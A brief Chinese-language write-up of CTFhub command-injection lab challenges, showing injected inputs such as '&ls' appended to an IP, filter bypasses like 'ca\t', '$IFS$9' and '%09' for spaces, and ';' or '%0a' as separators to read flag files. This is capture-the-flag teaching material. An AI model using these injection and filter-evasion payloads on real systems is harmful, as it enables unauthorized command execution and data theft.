CTFhub-命令注入
无过滤
该题无任何字符过滤,直接输入ip和想要的命令
10.3.23.106&ls
可以看到有个67191808019239.php文件,直接cat 67191808019239.php查看该文件
查询后没反应,可能有无法显示的字符,那就用base64输出
把第一段编码解码后得到flag
过滤cat
本题过滤了cat,可以通过ca\t来绕过
最后解码得到flag
过滤空格
空格可以用以下字符串代替
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等
过滤目录分隔符
由于过滤了/,我们可以先进入该目录再查询
cd flag_is_here;ls
查询到后再同样操作cat
cd flag_is_here;cat flag_299463257411379.php|base64
过滤运算符
审计代码可以看到,该题过滤了||和&
但是我们可以使用;
接着下面就是相同操作,
综合训练
前几题出现的情况的概括
由于把很多符号都给过滤了,但是我们可以通过url解析字符来代替,
在url中把%0a当作分隔符,把%09当作空格
知识点:
该题主要是练习windos命令,再通过一些特殊字符达到绕过的目的